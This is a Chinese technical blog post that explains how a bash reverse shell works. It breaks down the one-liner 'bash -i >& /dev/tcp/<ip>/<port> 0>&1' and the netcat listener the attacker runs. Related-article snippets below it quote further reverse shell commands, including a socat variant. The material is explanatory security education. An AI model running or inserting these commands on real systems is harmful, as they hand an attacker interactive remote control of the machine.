反向Shell(Reverse Shell)

原创 于 2025-08-20 15:54:13 发布 · 545 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

目的是让目标机器(执行这条命令的机器)主动连接到攻击者控制的服务器,从而让攻击者获得一个远程命令行 shell 控制权限

解这个命令:bash -i >& /dev/tcp/192.168.31.111/10029 0>&1

  1. bash -i

    • bash: 启动 Bash shell。

    • -i 参数:强制 Bash 以交互式(Interactive) 模式运行。这意味着它会提供一个提示符,并且可以接收用户输入,这是获得一个完整 shell 的前提。

  2. >& /dev/tcp/192.168.31.111/10029

    • 这是整个命令的核心,利用了 Bash 的一个特性。

    • /dev/tcp/<IP>/<Port>:在 Linux 中,这是一个特殊的伪设备文件。当你对它进行读写操作时,Bash 实际上会在底层建立一个 TCP Socket 连接,而不是真正地去读写一个磁盘文件。

    • 192.168.31.111:这是攻击者机器的 IP 地址。目标机器会尝试连接这个地址。

    • 10029:这是攻击者机器上监听的端口

    • >&:这是文件描述符重定向的简写,等同于 &>。它的作用是将标准输出(stdout, 文件描述符1) 和标准错误(stderr, 文件描述符2) 都重定向到后面的目标。

    • 所以,这部分的意思是:将 Bash 的所有输出和错误信息,都发送到与 192.168.31.111:10029 建立的 TCP 网络连接中去

  3. 0>&1

    • 0 代表标准输入(stdin),即键盘输入。

    • 1 代表标准输出(stdout),即屏幕输出。

    • 0>&1 的意思是:将标准输入(0)重定向到标准输出(1)的当前位置

    • 由于上一步已经把标准输出(1)重定向到了网络 socket,所以现在标准输入(0)也会被重定向到同一个网络 socket。

整体效果:
执行这条命令后,目标机器上的 Bash 会:

  1. 主动与 192.168.31.111 的 10029 端口建立 TCP 连接。

  2. 将这个网络连接既当作自己的“屏幕”(输出),也当作自己的“键盘”(输入)

  3. 这样,在攻击者的机器上(192.168.31.111),只要有一个程序在 10029 端口监听,就能收到这个连接,并获得一个完全交互式的 Bash shell,可以执行任何目标用户权限允许的命令。

攻击者需要做什么?

为了让这个反向 Shell 生效,攻击者必须提前在自己机器上(192.168.31.111)设置一个监听器(Listener)来接收这个连接。

最常用的工具是 netcat (通常简称 nc):

在攻击者机器上执行:

nc -lvnp 10029

    -l: 监听模式

    -v: 显示详细信息

    -n: 不解析域名

    -p 10029: 指定监听端口

    执行此命令后,netcat 会等待传入的连接,一旦目标执行了那条反向 Shell 命令,netcat 就会接收到连接,攻击者就获得了 shell。

    Python Security 之 反向Shell
    不急不躁
    07-14 1347
    首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP
    shell的正向和反向
    qq_46258964的博客
    02-05 9248
    正向shell反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
    WEB安全基础 - - -Linux反弹shell
    weixin_67503304的博客
    08-23 3353
    详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
    反向shell
    weixin_34162228的博客
    06-12 601
    为什么80%的码农都做不了架构师?>>> ...
    反向 shell
    lyyslsw的专栏
    12-27 752
    nc -p 4444 -lvv 监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15 bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14 bash -i : bash的交互模式 当>&后面接文件时,表示将标准输...
    HTTP-Reverse-Shell:Python中的HTTP反向Shell
    05-22
    这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
    reverse-shell-generator:简单的脚本来生成反向shell
    04-10
    我用Python编写的一个简单脚本可立即生成反向shell。 您不需要每次都打开Goog​​le,呵呵。 安装 1. Clone the Repository: git clone https://github.com/SoftwareUser23/reverse-shell-generator 2. Change the ...
    精选资源
    MIPS-Reverse:轻松生成MIPS反向shell shellcode!
    04-16
    MIPS-Reverse是一种可以为架构生成shellcode的工具,该工具将启动反向shell ,您可以在其中指定IP地址,端口和所需的shell ( / bin / sh , / bin / bash , / bin / dash )。 如何安装 # 1. Install pwntools $ ...
    提防远程攻击:了解正向 Shell反向 Shell 确保服务器安全
    最新发布
    .
    06-28 1463
    在当今网络安全形势日益复杂的环境中,了解正向 Shell反向 Shell 的工作原理和使用场景,对于保护你的服务器免受远程攻击至关重要。本文不仅深入解析这两种常见的远程控制技术,还将提供有效的防护建议,帮助你提升服务器的安全防护水平,确保你的系统免遭入侵。在计算机网络和信息安全领域,正向 Shell反向 Shell 是两种常见的远程控制技术。它们在渗透测试、漏洞利用以及系统管理等方面有着广泛应用。正向 Shell (Forward Shell) 是指攻击者直接连接到目标机器的 Shell
    精选资源
    php-reverse-shell
    07-24
    在`php-reverse-shell-master`这个项目中,我们可以找到一个简单的PHP反向Shell示例。它通常包含一个PHP文件,比如`reverse_shell.php`,其中包含了上述提到的连接设置、套接字通信和命令执行等功能。攻击者只需要...
    反向Shell增强
    aakwnam6338的博客
    03-11 228
    下载socat 在客户端: socat file:`tty`,raw,echo=0 tcp-listen:4444 在服务端: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 如此即可创建功能完全的反向shell 转载于:https://www.cnb...
    一个简单的反向shell
    weixin_33941350的博客
    03-18 410
    这个是在《Python***学习笔记:从HelloWorld到编写PoC(上)》 中看到的一个反向shell代码,因为本身我是学python3的,所以我把代码改成的python3。同时也做了编码方面一些小改动,使这个代码在linux和windows下都可以运行。udp_server.py#!/usr/bin/python3 __author__='Administrato...
    基于DNS的反向Shell
    手牵手科技
    04-19 568
    Chashell是一个由Go编写的基于DNS进行通信的反向shell。它可用于绕过防火墙或严格限制的网络。 它带有一个名为chaserv的多客户端控制服务器。 chashell 通信安全 每个数据包都使用对称加密(XSalsa20 + Poly1305)进行加密,客户端和服务器之间使用共享密钥。 我们计划在未来实现非对称加密。 协议 Chashell使用Protocol Buffers序列化消息进...
    高级黑客技术-5. 反向ShellShell
    jennycisp的博客
    06-15 1383
    ❝本指南提供了多种方法来建立反向Shell,包括使用加密和明文方式,适用于不同的场景和需求。通过这些技术,安全专家和合法授权的渗透测试者可以有效地控制远程系统,进行安全测试和漏洞评估。gs-netcat 提供加密的反向Shell,支持文件传输和管理员登录警报。Bash 和 cURL 方法允许通过简单的命令行工具建立连接。OpenSSL 和 remote.moe 提供了加密通道,增强了数据传输的安全性。
    黑客零基础第一章--反向shell
    ShadowBlade
    08-09 5225
    一篇文章叫你完全掌握反向shell
    反向Shell
    钱国正的专栏
    12-24 2823
    http://os.51cto.com/art/201312/424378.htm 反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,“一个普通的shell或简单的SSH通道不是也能实现这些吗?”不,无法实现。在网上,我看到很多人对普通shell反向shell之间的区别分不清。在我
    linux 建立反向shell
    weixin_34144450的博客
    02-01 310
    首先是netcat的版本选择BSD版的不支技-c -e参数,而GNU版的有-e参数,这里我用的是GNU版: sh-4.1# nc -V netcat (The GNU Netcat) 0.7.1 Copyright (C) 2002 - 2003 Giovanni Giacobbi This program comes with NO WARRANTY, to the extent perm...
    评论
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包
    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值